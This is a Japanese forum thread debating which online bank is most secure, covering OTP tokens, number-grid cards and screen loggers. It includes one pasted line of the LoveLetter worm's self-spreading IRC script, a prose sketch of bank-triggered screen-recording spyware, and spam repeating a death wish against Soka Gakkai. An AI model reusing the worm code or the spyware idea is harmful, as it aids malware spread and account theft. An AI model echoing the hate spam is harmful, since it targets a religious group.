ネットバンクで一番セキュリティの高いのは？

どこかな

[[A0624-aacQ9gWS-UT]]

<<涼宮ハルヒ＠涼宮ハルヒの憂鬱>>
彼女だけに投票。
他のアニメは知らないし知ろうとも思わないので投票も一つだけ。

はっきりいって彼女は二次元キャラの中でも
トップクラスに「リアル」なキャラだと思う。
（設定自体は非現実的だが）
彼女の性格、行動の動機にリアリティがあったからこそ、
見てる人に共感を持たれてこの作品はここまで売れたんだと思う。
たぶん、これを超える萌え系アニメは生まれない。
俺は普段アニメ見ないけど、ハルヒには萌えた。

ハルヒ・最萌選対スレは移行しました。ブックマークの変更をお願いします。
http://jbbs.livedoor.jp/anime/4218/

JNBでしょ

JNBで終了。トークンは伊達じゃない

ＵＦＪは？あれもトークンと同じでしょ。

時計入りで時刻によって変わる場合は同期が取れると思うけど
リーダーにカード刺すたびに番号かえる形式だと同期どうやってとるんだろう。
何回分か先まで計算しておくってことか?

トークンの仕組みがわからん。
ネットワークにつながってないのになんで
サーバーと連動したパスが生成できるのさ？

時間を入力値として同じアルゴリズムで乱数列を出力する
アルゴリズムの計算結果を知るのは銀行と本人しかいないのだから本人確証となるんじゃない？

にゃるほど

　　 ／￣＼
　　| 　^o^　|　＜トークンです
　　 ＼＿／
　　 ＿|　|＿
　　|　　 　　|
　　　　　　　　 ／￣＼
　　　　　　　　|　　　　 |＜　ブームくん
　　　　　　　　 ＼＿／
　　　　　　　　 ＿|　|＿
　　　　　　　　|　　　　　|

トークンは、ある意味セキュリティが劣ってるよな。
パスワードは人間の脳の中にだけ存在するのがいいのだが
トークンという媒体で物質化してしまっている。
おまけに、大きいから貴重品として常に持ち運ぶのはめんどくさい。
キーホルダーとして持ち運んでも、外れて落とすかもしれない。

トークンはセキュリティの向上というよりも
銀行がパスワード隠匿義務を放棄し
トークンという形で利用者へ押し付けているだけのようだ。
銀行がきちんとしたシステムを作ればトークンに頼る必要もなく、
もしもパスワードが知られてしまっても銀行の管理責任になっていた部分が、
トークンが盗難されれば利用者が悪いってことになる。

銀行の管理責任の一部を自己責任という形で、
利用者へ押し付けているのがトークンの実態。

>>12
どこの銀行であろうと通帳と印鑑を盗まれれば現金は引き出される罠。
つまりトークンを否定するってことは通帳印鑑も否定するってことになる。

パスワードに関しては頭の中だけじゃなくネットワークに出さなきログイン
できないからその時点で盗まれる可能性がある。トークンはそれがない。

都合のいい部分だけを切り取り、通帳や印鑑と、なぜトークンを比較するのか。

パスワードの件についても論外。
トークンにより出されるパスワードも盗まれる可能性があるが、
盗まれても害が無いというだけ。
だから、当然、利用者にトークンという負担を押し付けずに、
盗まれても構わないシステムを作れって言ってるだけ。

盗まれても構わないシステムを作れって言ってるだけ。⇒（パスワードを）盗まれても構わないシステムを作れって言ってるだけ。

>>14
>盗まれても構わないシステムを作れって言ってるだけ。

だからそれがトークンだろｗ
ほんとにﾊﾞｶだな（呆

それがどうした。論点すらわからないｸｽﾞは相手する価値なし。

>トークンは、ある意味セキュリティが劣ってるよな。

IDとパスワードだけだとスパイウェアで抜かれて簡単に不正送金される。
そういう事件が増えたからトークンが生まれた。
なぜトークンのセキュリティが劣ってるといえるんだ？？

>おまけに、大きいから貴重品として常に持ち運ぶのはめんどくさい。
>キーホルダーとして持ち運んでも、外れて落とすかもしれない。

なぜトークンをわざわざ持ち運ぶ必要性があるのかがわからん。

論点すら理解できてない人は相手しない
時間の無駄

なら最初から書くなよ。ほんとうにバカだなおまえは。

パスワードをｐｃで打ち込んでネットワークに流す時点でセキュリティはスカスカなんだよ。
その過程でいくらでも抜けるだろ。
だからパスはセキュリティ面では最低と言える。

ＵＦＪはどうよ？

しかし、>>12はハードウェアトークンの仕組みをしらない無知な人間か、
知っていても認めようとしない本物の馬鹿か、あるいは釣り人って感じだな。

普通、トークンってのはな、二要素認証のうちの一つの要素として使われるものなんだよ。
つまり、トークン（が生成するワンタイムパスワード）は、
通常のパスワードに置き換わるものじゃなく併用されるものだということ。

ジャパンネット銀行の場合なら、通常のパスワード（ログインパスワード）にプラスして、
トークンが生成するワンタイムパスワードを利用するわけだ。
通常のパスワードが盗まれてもトークンがなければ預金は引き出せないし、
逆にトークンが盗まれてもログインパスワードがわからなきゃログインできない。
セキュリティ面から言えば、当然のことながらトークンを利用しない通常の認証方式よりも、
トークンを採用してるほうが優れてるだろうよ。

ま、いくらハードウェアトークンを利用したからといっても、
通信を傍受して改竄できるほどのスキルのある奴には無意味だろうけどな。
飽く迄も、有効なのは、PCにキーロガーを仕掛けてパスワードを抜こうとしてる奴に対してだけ。
俺としてはこれだけでも十分だと思うけどな。

おっと、スレの答えは書いてなかったな。
ま、俺としてはジャパンネット銀行（JNB）が一番なんじゃないのって思う。
デフォルトでハードウェアトークンを採用してるわけだし。
あるいは、三井住友のOne'sダイレクトか。
こちらもオプション（月額105円）でワンタイムパスワード生成機を利用できるみたいだな。

現在、三菱東京UFJダイレクトは、カードにかかれている乱数表を利用する方式を採用しているが、
こちらは、まあまあなんじゃないの。ないよりかははるかにましって感じ。

＞三菱東京UFJダイレクトは、カードにかかれている乱数表を利用する方式を採用
＞しているが、 こちらは、まあまあなんじゃないの。ないよりかははるかにましって感じ。

トークンとセキュリティレベルは同じじゃないの？

>>25
違う。
トークンは1回限りの使い捨てのパスワードを生成するもの、
三菱東京UFJダイレクトの場合はカードに書かれている乱数表（つまり固定されたパスワード）を使う。
たとえば、パスワードが固定されている場合、
画面をモニタリングするようなソフトをぶちこまれたらアウトだ。

JNBの場合は1分ごとにパスワードが変わる。

三菱のカードってどんなのかわからん。

＞「ご契約者カード」（「ご契約カード」）を使い、毎回異なった確認番号の入力を
＞していただくことにより、お客さまのご本人確認を行うなど高いレベルの本人
＞確認方法を採用しています。

固定じゃないんじゃないの？

三菱東京UFJ（MUFG）のカードには↓の下のほうにある乱数表が描かれている。
https://azby.fmworld.net/usage/know_do/003/page2.html
この表がバレたら終わりってこと。

JNBも以前は↓みたいなIDカードを使ってたが、今はトークンに切り替わってる。
http://www.japannetbank.co.jp/card/switch/index.html

確かにＵＦＪは画面キャプチャーソフト仕組まれたら終わりだな・・・

＞JNBも以前は↓みたいなIDカードを使ってたが、今はトークンに切り替わってる。

おそらく不正送金の被害が出たから変更したんだろうな・・・

http://pc9.2ch.net/test/read.cgi/pcqa/1160681170/1-100

おいおい、ＰＣのモニタリングなんて簡単にできるわけないだろｗ

遠隔操作ソフトを知らんのか？
デスクトップがまるみえになるじゃん。

まぁ、遠隔操作は回線がぶっとくないと辛いだろうけどな。

あるいは、特定のパケットが流れたとき（銀行のサイトにアクセスしたとき）だけ
自動的にモニタリングソフトが起動するようにするとか、
キーロガーの動画版みたいなのを作ればいいだけだろ。
取り込む画質は最低でいいだろうし。
まぁ、CPUがトロくてHDDの容量が少ないようなチープなパソコンだと辛いと思うが。

スパイウェアなんて簡単に仕込めないだろｗ

学校のパソコンでネット銀行使うのはまずいかな？

>36
自殺行為以外の何物でもない。

携帯を使うべきだ。

>>36
ネカフェより危険

イーバンクかな

非常にログインが面倒になった新生じゃね？

>>41
確かに面倒になった！
ログインは前のままで、取引の時だけ
セキュリティーを高めるんで良いのでは。

>>40
セキュリティが高いって意味か？
みんな最低レベルだっていってるが・・・

ワンタイムパスワードやセキュリティカードを採用以降は被害無し？
それでも突破されたりするの？

仮にＰＣにスパイウェアが仕込まれていても
取引は暗号化されてるしソフトウェアキーボードで入力するから
情報が盗まれるって事は無いよね。

そーいや福岡銀行もトークンあったと思うぞ。
意外に見えたけどな。

トークンも有料だと使う気しない。
三井住友とか…

サイレントバンカーに対抗する方法ってあるの？ネット銀行全体が終わたか・・・

トークン盗まれたり電池切れたらどうなるの？

申請すりゃ再発行

ネットバンク専用のパソコンを用意すりゃいいだろ？　それすら無理な貧乏人なの？ｗ

>>41
ログイン時ATMなどで併用するカードの暗証番号入力させる時点で論外。
ありゃとにかく沢山入力させれば、セキュリティがあがると勘違いしている
or顧客が勘違いすると思っているだけだな。

ネットバンクのセキュリティに指紋認証とか入れたらまずいの？

ho

>>45
ttp://itpro.nikkeibp.co.jp/article/USNEWS/20060908/247574/

>>45 >>55
要するに動画のスクリーンロガーのことで、クリックされた時のキーの順番などが
わかるのが心配なのだろう。
　クリックした時マウスカーソルを一定時間記録するなら
　クリックしないで入力すればいい（スクリーンロガーは起動しない）　
　念のためマウスカーソルを隠してしまえばいい　（どこを押したか判らない）

既に対応済みソフトウェアキーボードで入力すればいいだけ。
http://www.aplin.com.au/?page_id=349（機能詳細　英語　USBにも対応）
カーソルを2秒間ボタンに合わせるだけでクリックしないで入力できる機能
とマウスカーソルをカメレオンのように隠す機能がある。
無防備なネットカフェ用に作られたものだが、心配ならどうぞ。

>>56
必ず最新版を使用すること。正式版には一部機能しないバグがある。
Future (beta) versionsからnsk-v3-alpha-3をダウンロードすること。
特に、クリック＆ドラッグした後にＴＥＸＴＢＯＸに保存してしまう
バグが、ちゃんと保存しない設定に修正してある。

他は問題なく動作します。
動画のスクリーンロガーに対して安全性が強化された。

>>57
すみません。あわててました。ドラッグ＆ドロップです。

test

>>21
せきゅあそけっとれいやーというものがあってだな（ｒｙ

Scriptini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"

>>13
いまは、どこでも暗証番号打たされるけどなぁ。

なんか、ＰＷ抜かれて中国人に送金するようなニュースがやってたね。

あけましておめでとうございまう

このスレにアンチウィルスが反応したんだが、>>61だよね？

創,価
死,ね　
創,価
死,ね
創,価
死,ね
創,価
死,ね
創,価
死,ね
創,価
死,ね
創,価
死,ね
創,価
死,ね
創,価
死,ね
創,価
死,ね
創,価
死,ね
創,価
死,ね
創,価
死,ね

【産経】ネットバンキング不正送金、５２口座凍結　新種ウイルス解析・警視庁-大半が中国人名義［09/16］
http://awabi.2ch.net/test/read.cgi/news4plus/1410890608/
【社会】警視庁、不正送金の52口座凍結...ワンタイムパスワードを盗む新種ウイルスで [14/09/16]
http://daily.2ch.net/test/read.cgi/newsplus/1410841135/
【社会】ログインしただけで不正送金　新型ウイルス国内で検出
http://daily.2ch.net/test/read.cgi/newsplus/1410877233/